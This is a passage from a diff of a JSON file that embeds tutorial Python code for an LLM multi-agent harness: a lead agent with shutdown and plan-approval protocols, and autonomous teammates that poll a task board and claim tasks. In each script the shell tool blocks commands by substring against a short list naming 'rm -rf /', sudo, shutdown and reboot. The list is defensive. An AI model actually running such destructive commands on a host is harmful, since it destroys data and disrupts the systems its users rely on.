(120s)\"\n\n\ndef _run_read(path: str, limit: int = None) -> str:\n try:\n lines = _safe_path(path).read_text().splitlines()\n if limit and limit < len(lines):\n lines = lines[:limit] + [f\"... ({len(lines) - limit} more)\"]\n return \"\\n\".join(lines)[:50000]\n except Exception as e:\n return f\"Error: {e}\"\n\n\ndef _run_write(path: str, content: str) -> str:\n try:\n fp = _safe_path(path)\n fp.parent.mkdir(parents=True, exist_ok=True)\n fp.write_text(content)\n return f\"Wrote {len(content)} bytes\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\ndef _run_edit(path: str, old_text: str, new_text: str) -> str:\n try:\n fp = _safe_path(path)\n c = fp.read_text()\n if old_text not in c:\n return f\"Error: Text not found in {path}\"\n fp.write_text(c.replace(old_text, new_text, 1))\n return f\"Edited {path}\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\n# -- Lead-specific protocol handlers --\ndef handle_shutdown_request(teammate: str) -> str:\n req_id = str(uuid.uuid4())[:8]\n with _tracker_lock:\n shutdown_requests[req_id] = {\"target\": teammate, \"status\": \"pending\"}\n BUS.send(\n \"lead\", teammate, \"Please shut down gracefully.\",\n \"shutdown_request\", {\"request_id\": req_id},\n )\n return f\"Shutdown request {req_id} sent to '{teammate}' (status: pending)\"\n\n\ndef handle_plan_review(request_id: str, approve: bool, feedback: str = \"\") -> str:\n with _tracker_lock:\n req = plan_requests.get(request_id)\n if not req:\n return f\"Error: Unknown plan request_id '{request_id}'\"\n with _tracker_lock:\n req[\"status\"] = \"approved\" if approve else \"rejected\"\n BUS.send(\n \"lead\", req[\"from\"], feedback, \"plan_approval_response\",\n {\"request_id\": request_id, \"approve\": approve, \"feedback\": feedback},\n )\n return f\"Plan {req['status']} for '{req['from']}'\"\n\n\ndef _check_shutdown_status(request_id: str) -> str:\n with _tracker_lock:\n return json.dumps(shutdown_requests.get(request_id, {\"error\": \"not found\"}))\n\n\n# -- Lead tool dispatch (12 tools) --\nTOOL_HANDLERS = {\n \"bash\": lambda **kw: _run_bash(kw[\"command\"]),\n \"read_file\": lambda **kw: _run_read(kw[\"path\"], kw.get(\"limit\")),\n \"write_file\": lambda **kw: _run_write(kw[\"path\"], kw[\"content\"]),\n \"edit_file\": lambda **kw: _run_edit(kw[\"path\"], kw[\"old_text\"], kw[\"new_text\"]),\n \"spawn_teammate\": lambda **kw: TEAM.spawn(kw[\"name\"], kw[\"role\"], kw[\"prompt\"]),\n \"list_teammates\": lambda **kw: TEAM.list_all(),\n \"send_message\": lambda **kw: BUS.send(\"lead\", kw[\"to\"], kw[\"content\"], kw.get(\"msg_type\", \"message\")),\n \"read_inbox\": lambda **kw: json.dumps(BUS.read_inbox(\"lead\"), indent=2),\n \"broadcast\": lambda **kw: BUS.broadcast(\"lead\", kw[\"content\"], TEAM.member_names()),\n \"shutdown_request\": lambda **kw: handle_shutdown_request(kw[\"teammate\"]),\n \"shutdown_response\": lambda **kw: _check_shutdown_status(kw.get(\"request_id\", \"\")),\n \"plan_approval\": lambda **kw: handle_plan_review(kw[\"request_id\"], kw[\"approve\"], kw.get(\"feedback\", \"\")),\n}\n\n# these base tools are unchanged from s02\nTOOLS = [\n {\"name\": \"bash\", \"description\": \"Run a shell command.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"command\": {\"type\": \"string\"}}, \"required\": [\"command\"]}},\n {\"name\": \"read_file\", \"description\": \"Read file contents.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"limit\": {\"type\": \"integer\"}}, \"required\": [\"path\"]}},\n {\"name\": \"write_file\", \"description\": \"Write content to file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}}, \"required\": [\"path\", \"content\"]}},\n {\"name\": \"edit_file\", \"description\": \"Replace exact text in file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"old_text\": {\"type\": \"string\"}, \"new_text\": {\"type\": \"string\"}}, \"required\": [\"path\", \"old_text\", \"new_text\"]}},\n {\"name\": \"spawn_teammate\", \"description\": \"Spawn a persistent teammate.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"name\": {\"type\": \"string\"}, \"role\": {\"type\": \"string\"}, \"prompt\": {\"type\": \"string\"}}, \"required\": [\"name\", \"role\", \"prompt\"]}},\n {\"name\": \"list_teammates\", \"description\": \"List all teammates.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {}}},\n {\"name\": \"send_message\", \"description\": \"Send a message to a teammate.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"to\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}, \"msg_type\": {\"type\": \"string\", \"enum\": list(VALID_MSG_TYPES)}}, \"required\": [\"to\", \"content\"]}},\n {\"name\": \"read_inbox\", \"description\": \"Read and drain the lead's inbox.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {}}},\n {\"name\": \"broadcast\", \"description\": \"Send a message to all teammates.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"content\": {\"type\": \"string\"}}, \"required\": [\"content\"]}},\n {\"name\": \"shutdown_request\", \"description\": \"Request a teammate to shut down gracefully. Returns a request_id for tracking.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"teammate\": {\"type\": \"string\"}}, \"required\": [\"teammate\"]}},\n {\"name\": \"shutdown_response\", \"description\": \"Check the status of a shutdown request by request_id.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"request_id\": {\"type\": \"string\"}}, \"required\": [\"request_id\"]}},\n {\"name\": \"plan_approval\", \"description\": \"Approve or reject a teammate's plan. Provide request_id + approve + optional feedback.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"request_id\": {\"type\": \"string\"}, \"approve\": {\"type\": \"boolean\"}, \"feedback\": {\"type\": \"string\"}}, \"required\": [\"request_id\", \"approve\"]}},\n]\n\n\ndef agent_loop(messages: list):\n while True:\n inbox = BUS.read_inbox(\"lead\")\n if inbox:\n messages.append({\n \"role\": \"user\",\n \"content\": f\"{json.dumps(inbox, indent=2)}\",\n })\n response = client.messages.create(\n model=MODEL,\n system=SYSTEM,\n messages=messages,\n tools=TOOLS,\n max_tokens=8000,\n )\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n return\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n try:\n output = handler(**block.input) if handler else f\"Unknown tool: {block.name}\"\n except Exception as e:\n output = f\"Error: {e}\"\n print(f\"> {block.name}:\")\n print(str(output)[:200])\n results.append({\n \"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": str(output),\n })\n messages.append({\"role\": \"user\", \"content\": results})\n\n\nif __name__ == \"__main__\":\n history = []\n while True:\n try:\n query = input(\"\\033[36ms10 >> \\033[0m\")\n except (EOFError, KeyboardInterrupt):\n break\n if query.strip().lower() in (\"q\", \"exit\", \"\"):\n break\n if query.strip() == \"/team\":\n print(TEAM.list_all())\n continue\n if query.strip() == \"/inbox\":\n print(json.dumps(BUS.read_inbox(\"lead\"), indent=2))\n continue\n history.append({\"role\": \"user\", \"content\": query})\n agent_loop(history)\n response_content = history[-1][\"content\"]\n if isinstance(response_content, list):\n for block in response_content:\n if hasattr(block, \"text\"):\n print(block.text)\n print()\n" }, { "id": "s11", "filename": "s11_autonomous_agents.py", "title": "Autonomous Agents", "subtitle": "Scan Board, Claim Tasks", - "loc": 499, + "loc": 506, "tools": [ "bash", "read_file", @@ -656,86 +656,86 @@ "classes": [ { "name": "MessageBus", - "startLine": 80, - "endLine": 121 + "startLine": 81, + "endLine": 122 }, { "name": "TeammateManager", - "startLine": 159, - "endLine": 368 + "startLine": 168, + "endLine": 379 } ], "functions": [ { "name": "scan_unclaimed_tasks", "signature": "def scan_unclaimed_tasks()", - "startLine": 126 + "startLine": 127 }, { "name": "claim_task", "signature": "def claim_task(task_id: int, owner: str)", - "startLine": 138 + "startLine": 139 }, { "name": "make_identity_block", "signature": "def make_identity_block(name: str, role: str, team_name: str)", - "startLine": 151 + "startLine": 160 }, { "name": "_safe_path", "signature": "def _safe_path(p: str)", - "startLine": 373 + "startLine": 384 }, { "name": "_run_bash", "signature": "def _run_bash(command: str)", - "startLine": 380 + "startLine": 391 }, { "name": "_run_read", "signature": "def _run_read(path: str, limit: int = None)", - "startLine": 395 + "startLine": 406 }, { "name": "_run_write", "signature": "def _run_write(path: str, content: str)", - "startLine": 405 + "startLine": 416 }, { "name": "_run_edit", "signature": "def _run_edit(path: str, old_text: str, new_text: str)", - "startLine": 415 + "startLine": 426 }, { "name": "handle_shutdown_request", "signature": "def handle_shutdown_request(teammate: str)", - "startLine": 428 + "startLine": 439 }, { "name": "handle_plan_review", "signature": "def handle_plan_review(request_id: str, approve: bool, feedback: str = \"\")", - "startLine": 439 + "startLine": 450 }, { "name": "_check_shutdown_status", "signature": "def _check_shutdown_status(request_id: str)", - "startLine": 453 + "startLine": 464 }, { "name": "agent_loop", "signature": "def agent_loop(messages: list)", - "startLine": 509 + "startLine": 520 } ], "layer": "collaboration", - "source": "#!/usr/bin/env python3\n\"\"\"\ns11_autonomous_agents.py - Autonomous Agents\n\nIdle cycle with task board polling, auto-claiming unclaimed tasks, and\nidentity re-injection after context compression. Builds on s10's protocols.\n\n Teammate lifecycle:\n +-------+\n | spawn |\n +---+---+\n |\n v\n +-------+ tool_use +-------+\n | WORK | <----------- | LLM |\n +---+---+ +-------+\n |\n | stop_reason != tool_use\n v\n +--------+\n | IDLE | poll every 5s for up to 60s\n +---+----+\n |\n +---> check inbox -> message? -> resume WORK\n |\n +---> scan .tasks/ -> unclaimed? -> claim -> resume WORK\n |\n +---> timeout (60s) -> shutdown\n\n Identity re-injection after compression:\n messages = [identity_block, ...remaining...]\n \"You are 'coder', role: backend, team: my-team\"\n\nKey insight: \"The agent finds work itself.\"\n\"\"\"\n\nimport json\nimport os\nimport subprocess\nimport threading\nimport time\nimport uuid\nfrom pathlib import Path\n\nfrom anthropic import Anthropic\nfrom dotenv import load_dotenv\n\nload_dotenv(override=True)\nif os.getenv(\"ANTHROPIC_BASE_URL\"):\n os.environ.pop(\"ANTHROPIC_AUTH_TOKEN\", None)\n\nWORKDIR = Path.cwd()\nclient = Anthropic(base_url=os.getenv(\"ANTHROPIC_BASE_URL\"))\nMODEL = os.environ[\"MODEL_ID\"]\nTEAM_DIR = WORKDIR / \".team\"\nINBOX_DIR = TEAM_DIR / \"inbox\"\nTASKS_DIR = WORKDIR / \".tasks\"\n\nPOLL_INTERVAL = 5\nIDLE_TIMEOUT = 60\n\nSYSTEM = f\"You are a team lead at {WORKDIR}. Teammates are autonomous -- they find work themselves.\"\n\nVALID_MSG_TYPES = {\n \"message\",\n \"broadcast\",\n \"shutdown_request\",\n \"shutdown_response\",\n \"plan_approval_response\",\n}\n\n# -- Request trackers --\nshutdown_requests = {}\nplan_requests = {}\n_tracker_lock = threading.Lock()\n_claim_lock = threading.Lock()\n\n\n# -- MessageBus: JSONL inbox per teammate --\nclass MessageBus:\n def __init__(self, inbox_dir: Path):\n self.dir = inbox_dir\n self.dir.mkdir(parents=True, exist_ok=True)\n\n def send(self, sender: str, to: str, content: str,\n msg_type: str = \"message\", extra: dict = None) -> str:\n if msg_type not in VALID_MSG_TYPES:\n return f\"Error: Invalid type '{msg_type}'. Valid: {VALID_MSG_TYPES}\"\n msg = {\n \"type\": msg_type,\n \"from\": sender,\n \"content\": content,\n \"timestamp\": time.time(),\n }\n if extra:\n msg.update(extra)\n inbox_path = self.dir / f\"{to}.jsonl\"\n with open(inbox_path, \"a\") as f:\n f.write(json.dumps(msg) + \"\\n\")\n return f\"Sent {msg_type} to {to}\"\n\n def read_inbox(self, name: str) -> list:\n inbox_path = self.dir / f\"{name}.jsonl\"\n if not inbox_path.exists():\n return []\n messages = []\n for line in inbox_path.read_text().strip().splitlines():\n if line:\n messages.append(json.loads(line))\n inbox_path.write_text(\"\")\n return messages\n\n def broadcast(self, sender: str, content: str, teammates: list) -> str:\n count = 0\n for name in teammates:\n if name != sender:\n self.send(sender, name, content, \"broadcast\")\n count += 1\n return f\"Broadcast to {count} teammates\"\n\n\nBUS = MessageBus(INBOX_DIR)\n\n\n# -- Task board scanning --\ndef scan_unclaimed_tasks() -> list:\n TASKS_DIR.mkdir(exist_ok=True)\n unclaimed = []\n for f in sorted(TASKS_DIR.glob(\"task_*.json\")):\n task = json.loads(f.read_text())\n if (task.get(\"status\") == \"pending\"\n and not task.get(\"owner\")\n and not task.get(\"blockedBy\")):\n unclaimed.append(task)\n return unclaimed\n\n\ndef claim_task(task_id: int, owner: str) -> str:\n with _claim_lock:\n path = TASKS_DIR / f\"task_{task_id}.json\"\n if not path.exists():\n return f\"Error: Task {task_id} not found\"\n task = json.loads(path.read_text())\n task[\"owner\"] = owner\n task[\"status\"] = \"in_progress\"\n path.write_text(json.dumps(task, indent=2))\n return f\"Claimed task #{task_id} for {owner}\"\n\n\n# -- Identity re-injection after compression --\ndef make_identity_block(name: str, role: str, team_name: str) -> dict:\n return {\n \"role\": \"user\",\n \"content\": f\"You are '{name}', role: {role}, team: {team_name}. Continue your work.\",\n }\n\n\n# -- Autonomous TeammateManager --\nclass TeammateManager:\n def __init__(self, team_dir: Path):\n self.dir = team_dir\n self.dir.mkdir(exist_ok=True)\n self.config_path = self.dir / \"config.json\"\n self.config = self._load_config()\n self.threads = {}\n\n def _load_config(self) -> dict:\n if self.config_path.exists():\n return json.loads(self.config_path.read_text())\n return {\"team_name\": \"default\", \"members\": []}\n\n def _save_config(self):\n self.config_path.write_text(json.dumps(self.config, indent=2))\n\n def _find_member(self, name: str) -> dict:\n for m in self.config[\"members\"]:\n if m[\"name\"] == name:\n return m\n return None\n\n def _set_status(self, name: str, status: str):\n member = self._find_member(name)\n if member:\n member[\"status\"] = status\n self._save_config()\n\n def spawn(self, name: str, role: str, prompt: str) -> str:\n member = self._find_member(name)\n if member:\n if member[\"status\"] not in (\"idle\", \"shutdown\"):\n return f\"Error: '{name}' is currently {member['status']}\"\n member[\"status\"] = \"working\"\n member[\"role\"] = role\n else:\n member = {\"name\": name, \"role\": role, \"status\": \"working\"}\n self.config[\"members\"].append(member)\n self._save_config()\n thread = threading.Thread(\n target=self._loop,\n args=(name, role, prompt),\n daemon=True,\n )\n self.threads[name] = thread\n thread.start()\n return f\"Spawned '{name}' (role: {role})\"\n\n def _loop(self, name: str, role: str, prompt: str):\n team_name = self.config[\"team_name\"]\n sys_prompt = (\n f\"You are '{name}', role: {role}, team: {team_name}, at {WORKDIR}. \"\n f\"Use idle tool when you have no more work. You will auto-claim new tasks.\"\n )\n messages = [{\"role\": \"user\", \"content\": prompt}]\n tools = self._teammate_tools()\n\n while True:\n # -- WORK PHASE: standard agent loop --\n for _ in range(50):\n inbox = BUS.read_inbox(name)\n for msg in inbox:\n if msg.get(\"type\") == \"shutdown_request\":\n self._set_status(name, \"shutdown\")\n return\n messages.append({\"role\": \"user\", \"content\": json.dumps(msg)})\n try:\n response = client.messages.create(\n model=MODEL,\n system=sys_prompt,\n messages=messages,\n tools=tools,\n max_tokens=8000,\n )\n except Exception:\n self._set_status(name, \"idle\")\n return\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n break\n results = []\n idle_requested = False\n for block in response.content:\n if block.type == \"tool_use\":\n if block.name == \"idle\":\n idle_requested = True\n output = \"Entering idle phase. Will poll for new tasks.\"\n else:\n output = self._exec(name, block.name, block.input)\n print(f\" [{name}] {block.name}: {str(output)[:120]}\")\n results.append({\n \"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": str(output),\n })\n messages.append({\"role\": \"user\", \"content\": results})\n if idle_requested:\n break\n\n # -- IDLE PHASE: poll for inbox messages and unclaimed tasks --\n self._set_status(name, \"idle\")\n resume = False\n polls = IDLE_TIMEOUT // max(POLL_INTERVAL, 1)\n for _ in range(polls):\n time.sleep(POLL_INTERVAL)\n inbox = BUS.read_inbox(name)\n if inbox:\n for msg in inbox:\n if msg.get(\"type\") == \"shutdown_request\":\n self._set_status(name, \"shutdown\")\n return\n messages.append({\"role\": \"user\", \"content\": json.dumps(msg)})\n resume = True\n break\n unclaimed = scan_unclaimed_tasks()\n if unclaimed:\n task = unclaimed[0]\n claim_task(task[\"id\"], name)\n task_prompt = (\n f\"Task #{task['id']}: {task['subject']}\\n\"\n f\"{task.get('description', '')}\"\n )\n if len(messages) <= 3:\n messages.insert(0, make_identity_block(name, role, team_name))\n messages.insert(1, {\"role\": \"assistant\", \"content\": f\"I am {name}. Continuing.\"})\n messages.append({\"role\": \"user\", \"content\": task_prompt})\n messages.append({\"role\": \"assistant\", \"content\": f\"Claimed task #{task['id']}. Working on it.\"})\n resume = True\n break\n\n if not resume:\n self._set_status(name, \"shutdown\")\n return\n self._set_status(name, \"working\")\n\n def _exec(self, sender: str, tool_name: str, args: dict) -> str:\n # these base tools are unchanged from s02\n if tool_name == \"bash\":\n return _run_bash(args[\"command\"])\n if tool_name == \"read_file\":\n return _run_read(args[\"path\"])\n if tool_name == \"write_file\":\n return _run_write(args[\"path\"], args[\"content\"])\n if tool_name == \"edit_file\":\n return _run_edit(args[\"path\"], args[\"old_text\"], args[\"new_text\"])\n if tool_name == \"send_message\":\n return BUS.send(sender, args[\"to\"], args[\"content\"], args.get(\"msg_type\", \"message\"))\n if tool_name == \"read_inbox\":\n return json.dumps(BUS.read_inbox(sender), indent=2)\n if tool_name == \"shutdown_response\":\n req_id = args[\"request_id\"]\n with _tracker_lock:\n if req_id in shutdown_requests:\n shutdown_requests[req_id][\"status\"] = \"approved\" if args[\"approve\"] else \"rejected\"\n BUS.send(\n sender, \"lead\", args.get(\"reason\", \"\"),\n \"shutdown_response\", {\"request_id\": req_id, \"approve\": args[\"approve\"]},\n )\n return f\"Shutdown {'approved' if args['approve'] else 'rejected'}\"\n if tool_name == \"plan_approval\":\n plan_text = args.get(\"plan\", \"\")\n req_id = str(uuid.uuid4())[:8]\n with _tracker_lock:\n plan_requests[req_id] = {\"from\": sender, \"plan\": plan_text, \"status\": \"pending\"}\n BUS.send(\n sender, \"lead\", plan_text, \"plan_approval_response\",\n {\"request_id\": req_id, \"plan\": plan_text},\n )\n return f\"Plan submitted (request_id={req_id}). Waiting for approval.\"\n if tool_name == \"claim_task\":\n return claim_task(args[\"task_id\"], sender)\n return f\"Unknown tool: {tool_name}\"\n\n def _teammate_tools(self) -> list:\n # these base tools are unchanged from s02\n return [\n {\"name\": \"bash\", \"description\": \"Run a shell command.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"command\": {\"type\": \"string\"}}, \"required\": [\"command\"]}},\n {\"name\": \"read_file\", \"description\": \"Read file contents.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}}, \"required\": [\"path\"]}},\n {\"name\": \"write_file\", \"description\": \"Write content to file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}}, \"required\": [\"path\", \"content\"]}},\n {\"name\": \"edit_file\", \"description\": \"Replace exact text in file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"old_text\": {\"type\": \"string\"}, \"new_text\": {\"type\": \"string\"}}, \"required\": [\"path\", \"old_text\", \"new_text\"]}},\n {\"name\": \"send_message\", \"description\": \"Send message to a teammate.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"to\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}, \"msg_type\": {\"type\": \"string\", \"enum\": list(VALID_MSG_TYPES)}}, \"required\": [\"to\", \"content\"]}},\n {\"name\": \"read_inbox\", \"description\": \"Read and drain your inbox.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {}}},\n {\"name\": \"shutdown_response\", \"description\": \"Respond to a shutdown request.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"request_id\": {\"type\": \"string\"}, \"approve\": {\"type\": \"boolean\"}, \"reason\": {\"type\": \"string\"}}, \"required\": [\"request_id\", \"approve\"]}},\n {\"name\": \"plan_approval\", \"description\": \"Submit a plan for lead approval.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"plan\": {\"type\": \"string\"}}, \"required\": [\"plan\"]}},\n {\"name\": \"idle\", \"description\": \"Signal that you have no more work. Enters idle polling phase.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {}}},\n {\"name\": \"claim_task\", \"description\": \"Claim a task from the task board by ID.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"task_id\": {\"type\": \"integer\"}}, \"required\": [\"task_id\"]}},\n ]\n\n def list_all(self) -> str:\n if not self.config[\"members\"]:\n return \"No teammates.\"\n lines = [f\"Team: {self.config['team_name']}\"]\n for m in self.config[\"members\"]:\n lines.append(f\" {m['name']} ({m['role']}): {m['status']}\")\n return \"\\n\".join(lines)\n\n def member_names(self) -> list:\n return [m[\"name\"] for m in self.config[\"members\"]]\n\n\nTEAM = TeammateManager(TEAM_DIR)\n\n\n# -- Base tool implementations (these base tools are unchanged from s02) --\ndef _safe_path(p: str) -> Path:\n path = (WORKDIR / p).resolve()\n if not path.is_relative_to(WORKDIR):\n raise ValueError(f\"Path escapes workspace: {p}\")\n return path\n\n\ndef _run_bash(command: str) -> str:\n dangerous = [\"rm -rf /\", \"sudo\", \"shutdown\", \"reboot\"]\n if any(d in command for d in dangerous):\n return \"Error: Dangerous command blocked\"\n try:\n r = subprocess.run(\n command, shell=True, cwd=WORKDIR,\n capture_output=True, text=True, timeout=120,\n )\n out = (r.stdout + r.stderr).strip()\n return out[:50000] if out else \"(no output)\"\n except subprocess.TimeoutExpired:\n return \"Error: Timeout (120s)\"\n\n\ndef _run_read(path: str, limit: int = None) -> str:\n try:\n lines = _safe_path(path).read_text().splitlines()\n if limit and limit < len(lines):\n lines = lines[:limit] + [f\"... ({len(lines) - limit} more)\"]\n return \"\\n\".join(lines)[:50000]\n except Exception as e:\n return f\"Error: {e}\"\n\n\ndef _run_write(path: str, content: str) -> str:\n try:\n fp = _safe_path(path)\n fp.parent.mkdir(parents=True, exist_ok=True)\n fp.write_text(content)\n return f\"Wrote {len(content)} bytes\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\ndef _run_edit(path: str, old_text: str, new_text: str) -> str:\n try:\n fp = _safe_path(path)\n c = fp.read_text()\n if old_text not in c:\n return f\"Error: Text not found in {path}\"\n fp.write_text(c.replace(old_text, new_text, 1))\n return f\"Edited {path}\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\n# -- Lead-specific protocol handlers --\ndef handle_shutdown_request(teammate: str) -> str:\n req_id = str(uuid.uuid4())[:8]\n with _tracker_lock:\n shutdown_requests[req_id] = {\"target\": teammate, \"status\": \"pending\"}\n BUS.send(\n \"lead\", teammate, \"Please shut down gracefully.\",\n \"shutdown_request\", {\"request_id\": req_id},\n )\n return f\"Shutdown request {req_id} sent to '{teammate}'\"\n\n\ndef handle_plan_review(request_id: str, approve: bool, feedback: str = \"\") -> str:\n with _tracker_lock:\n req = plan_requests.get(request_id)\n if not req:\n return f\"Error: Unknown plan request_id '{request_id}'\"\n with _tracker_lock:\n req[\"status\"] = \"approved\" if approve else \"rejected\"\n BUS.send(\n \"lead\", req[\"from\"], feedback, \"plan_approval_response\",\n {\"request_id\": request_id, \"approve\": approve, \"feedback\": feedback},\n )\n return f\"Plan {req['status']} for '{req['from']}'\"\n\n\ndef _check_shutdown_status(request_id: str) -> str:\n with _tracker_lock:\n return json.dumps(shutdown_requests.get(request_id, {\"error\": \"not found\"}))\n\n\n# -- Lead tool dispatch (14 tools) --\nTOOL_HANDLERS = {\n \"bash\": lambda **kw: _run_bash(kw[\"command\"]),\n \"read_file\": lambda **kw: _run_read(kw[\"path\"], kw.get(\"limit\")),\n \"write_file\": lambda **kw: _run_write(kw[\"path\"], kw[\"content\"]),\n \"edit_file\": lambda **kw: _run_edit(kw[\"path\"], kw[\"old_text\"], kw[\"new_text\"]),\n \"spawn_teammate\": lambda **kw: TEAM.spawn(kw[\"name\"], kw[\"role\"], kw[\"prompt\"]),\n \"list_teammates\": lambda **kw: TEAM.list_all(),\n \"send_message\": lambda **kw: BUS.send(\"lead\", kw[\"to\"], kw[\"content\"], kw.get(\"msg_type\", \"message\")),\n \"read_inbox\": lambda **kw: json.dumps(BUS.read_inbox(\"lead\"), indent=2),\n \"broadcast\": lambda **kw: BUS.broadcast(\"lead\", kw[\"content\"], TEAM.member_names()),\n \"shutdown_request\": lambda **kw: handle_shutdown_request(kw[\"teammate\"]),\n \"shutdown_response\": lambda **kw: _check_shutdown_status(kw.get(\"request_id\", \"\")),\n \"plan_approval\": lambda **kw: handle_plan_review(kw[\"request_id\"], kw[\"approve\"], kw.get(\"feedback\", \"\")),\n \"idle\": lambda **kw: \"Lead does not idle.\",\n \"claim_task\": lambda **kw: claim_task(kw[\"task_id\"], \"lead\"),\n}\n\n# these base tools are unchanged from s02\nTOOLS = [\n {\"name\": \"bash\", \"description\": \"Run a shell command.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"command\": {\"type\": \"string\"}}, \"required\": [\"command\"]}},\n {\"name\": \"read_file\", \"description\": \"Read file contents.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"limit\": {\"type\": \"integer\"}}, \"required\": [\"path\"]}},\n {\"name\": \"write_file\", \"description\": \"Write content to file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}}, \"required\": [\"path\", \"content\"]}},\n {\"name\": \"edit_file\", \"description\": \"Replace exact text in file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"old_text\": {\"type\": \"string\"}, \"new_text\": {\"type\": \"string\"}}, \"required\": [\"path\", \"old_text\", \"new_text\"]}},\n {\"name\": \"spawn_teammate\", \"description\": \"Spawn an autonomous teammate.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"name\": {\"type\": \"string\"}, \"role\": {\"type\": \"string\"}, \"prompt\": {\"type\": \"string\"}}, \"required\": [\"name\", \"role\", \"prompt\"]}},\n {\"name\": \"list_teammates\", \"description\": \"List all teammates.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {}}},\n {\"name\": \"send_message\", \"description\": \"Send a message to a teammate.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"to\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}, \"msg_type\": {\"type\": \"string\", \"enum\": list(VALID_MSG_TYPES)}}, \"required\": [\"to\", \"content\"]}},\n {\"name\": \"read_inbox\", \"description\": \"Read and drain the lead's inbox.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {}}},\n {\"name\": \"broadcast\", \"description\": \"Send a message to all teammates.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"content\": {\"type\": \"string\"}}, \"required\": [\"content\"]}},\n {\"name\": \"shutdown_request\", \"description\": \"Request a teammate to shut down.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"teammate\": {\"type\": \"string\"}}, \"required\": [\"teammate\"]}},\n {\"name\": \"shutdown_response\", \"description\": \"Check shutdown request status.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"request_id\": {\"type\": \"string\"}}, \"required\": [\"request_id\"]}},\n {\"name\": \"plan_approval\", \"description\": \"Approve or reject a teammate's plan.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"request_id\": {\"type\": \"string\"}, \"approve\": {\"type\": \"boolean\"}, \"feedback\": {\"type\": \"string\"}}, \"required\": [\"request_id\", \"approve\"]}},\n {\"name\": \"idle\", \"description\": \"Enter idle state (for lead -- rarely used).\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {}}},\n {\"name\": \"claim_task\", \"description\": \"Claim a task from the board by ID.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"task_id\": {\"type\": \"integer\"}}, \"required\": [\"task_id\"]}},\n]\n\n\ndef agent_loop(messages: list):\n while True:\n inbox = BUS.read_inbox(\"lead\")\n if inbox:\n messages.append({\n \"role\": \"user\",\n \"content\": f\"{json.dumps(inbox, indent=2)}\",\n })\n messages.append({\n \"role\": \"assistant\",\n \"content\": \"Noted inbox messages.\",\n })\n response = client.messages.create(\n model=MODEL,\n system=SYSTEM,\n messages=messages,\n tools=TOOLS,\n max_tokens=8000,\n )\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n return\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n try:\n output = handler(**block.input) if handler else f\"Unknown tool: {block.name}\"\n except Exception as e:\n output = f\"Error: {e}\"\n print(f\"> {block.name}: {str(output)[:200]}\")\n results.append({\n \"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": str(output),\n })\n messages.append({\"role\": \"user\", \"content\": results})\n\n\nif __name__ == \"__main__\":\n history = []\n while True:\n try:\n query = input(\"\\033[36ms11 >> \\033[0m\")\n except (EOFError, KeyboardInterrupt):\n break\n if query.strip().lower() in (\"q\", \"exit\", \"\"):\n break\n if query.strip() == \"/team\":\n print(TEAM.list_all())\n continue\n if query.strip() == \"/inbox\":\n print(json.dumps(BUS.read_inbox(\"lead\"), indent=2))\n continue\n if query.strip() == \"/tasks\":\n TASKS_DIR.mkdir(exist_ok=True)\n for f in sorted(TASKS_DIR.glob(\"task_*.json\")):\n t = json.loads(f.read_text())\n marker = {\"pending\": 